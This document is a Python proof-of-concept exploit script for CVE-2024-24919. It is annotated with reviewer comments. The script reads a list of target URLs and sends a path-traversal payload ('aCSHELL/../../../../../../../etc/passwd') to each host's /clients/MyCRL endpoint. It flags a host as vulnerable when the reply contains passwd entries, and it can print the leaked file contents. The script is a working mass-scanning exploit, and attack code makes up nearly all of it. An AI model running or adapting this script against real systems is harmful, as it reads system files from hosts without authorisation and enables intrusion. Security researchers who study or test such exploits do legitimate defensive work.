2-CVE-2024-24919-PoC.py
import argparse
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning for the whole process. This goes
# with the verify=False call in make_request(): certificate validation is off
# and nothing is printed to say so, so results carry no assurance about which
# host actually answered.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Substrings that check_vulnerability() looks for in a response body. They are
# account-name prefixes as found in a passwd-style file, which is what the
# default payload in main() asks for.
# NOTE(review): plain substring matching; any page that merely contains
# "root:" or "nobody:" is reported as vulnerable, and a response to a custom
# -p payload is still judged against these same markers.
VULNERABLE_STRINGS = ['root:', 'nobody:']
def make_request(url, payload, verbose=False):
    """Send *payload* as a POST body to *url* and evaluate the reply.

    A reply whose status passes ``response.ok`` is handed to
    ``check_vulnerability``; any other status is reported with its code.
    ``requests.RequestException`` is caught and printed, so one failing
    target does not stop the caller.

    Args:
        url: Full request URL (the caller appends the endpoint path).
        payload: Raw request body.
        verbose: Forwarded to ``check_vulnerability``.

    Returns:
        None. All results are written to stdout.
    """
    try:
        # verify=False: the server certificate is not validated, so the
        # identity of the responder is unconfirmed.
        # NOTE(review): no timeout is passed; an unresponsive host blocks
        # the run indefinitely.
        reply = requests.post(url, data=payload, verify=False)
        if not reply.ok:
            print(f"[-] {url} responded with status code: {reply.status_code}")
            return
        check_vulnerability(url, reply.text, payload, verbose)
    except requests.RequestException as err:
        print(f"Error making request to {url}: {err}")
def check_vulnerability(url, response_text, payload, verbose):
    """Report whether *response_text* contains any marker string.

    The verdict is a substring test against ``VULNERABLE_STRINGS``; the
    first hit is enough. It is a heuristic, not proof: a body that happens
    to contain a marker is reported as vulnerable, and a patched or
    differently configured system returning unrelated content is reported
    as not vulnerable.

    Args:
        url: Target URL, used only in the printed message.
        response_text: Decoded response body to inspect.
        payload: Accepted for interface symmetry; not used here.
        verbose: When true, the full response body is printed after a
            positive verdict. That output is the disclosed file content,
            so anything capturing stdout (logs, CI output, terminal
            history) then holds it too.

    Returns:
        None. The verdict is written to stdout.
    """
    marker_found = any(marker in response_text for marker in VULNERABLE_STRINGS)
    if not marker_found:
        print(f"Target {url} is not vulnerable")
        return

    print(f"Target {url} is vulnerable")
    if verbose:
        print(response_text)
def process_targets(file_path, payload, verbose):
    """Read target base URLs from *file_path* and check each one.

    Each line is stripped; lines that do not start with ``http://`` or
    ``https://`` are reported and skipped (this includes blank lines).
    Accepted lines get ``/clients/MyCRL`` appended and are passed to
    ``make_request``.

    Args:
        file_path: Text file with one base URL per line.
        payload: Request body forwarded to ``make_request``.
        verbose: Forwarded to ``make_request``.

    Returns:
        None. Progress and errors are written to stdout.
    """
    accepted_schemes = ('http://', 'https://')
    try:
        with open(file_path, 'r') as handle:
            raw_lines = handle.readlines()

        for raw in raw_lines:
            target = raw.strip()
            if not target.startswith(accepted_schemes):
                print(f"Skipping invalid URL: {target}")
                continue
            make_request(target + '/clients/MyCRL', payload, verbose)
    except FileNotFoundError:
        print(f"Error: File '{file_path}' not found.")
    except Exception as exc:
        # Broad catch: an unexpected error on one target ends the whole
        # run, with only the message printed.
        print(f"An error occurred: {exc}")
def main():
    """Parse command-line options and run the check over the target list.

    Options:
        -l  File with one HTTP/HTTPS base URL per line (default target.txt).
        -p  Request body to send; defaults to the path string defined below.
        -v  Print the response body for targets reported as vulnerable.

    NOTE(review): the verdict in ``check_vulnerability`` always looks for
    passwd-style markers, whatever is passed to -p, so a result is only
    meaningful with the default payload.
    """
    default_payload = "aCSHELL/../../../../../../../etc/passwd"

    cli = argparse.ArgumentParser(
        description="CVE-2024-24919 Exploit, made with love by Proton Negativo."
    )
    cli.add_argument(
        "-l",
        metavar='filename',
        type=str,
        default='target.txt',
        help="File containing list of HTTP/HTTPS targets (default: target.txt)",
    )
    cli.add_argument(
        "-p",
        metavar='payload',
        type=str,
        default=default_payload,
        help="Custom payload path (e.g., -p /etc/passwd)",
    )
    cli.add_argument(
        "-v",
        action='store_true',
        help="Verbose mode to show the response text",
    )

    options = cli.parse_args()
    process_targets(options.l, options.p, options.v)
# Run the command-line entry point only when the file is executed as a script;
# importing the module has no effect beyond the urllib3 warning suppression
# at module level.
if __name__ == "__main__":
    main()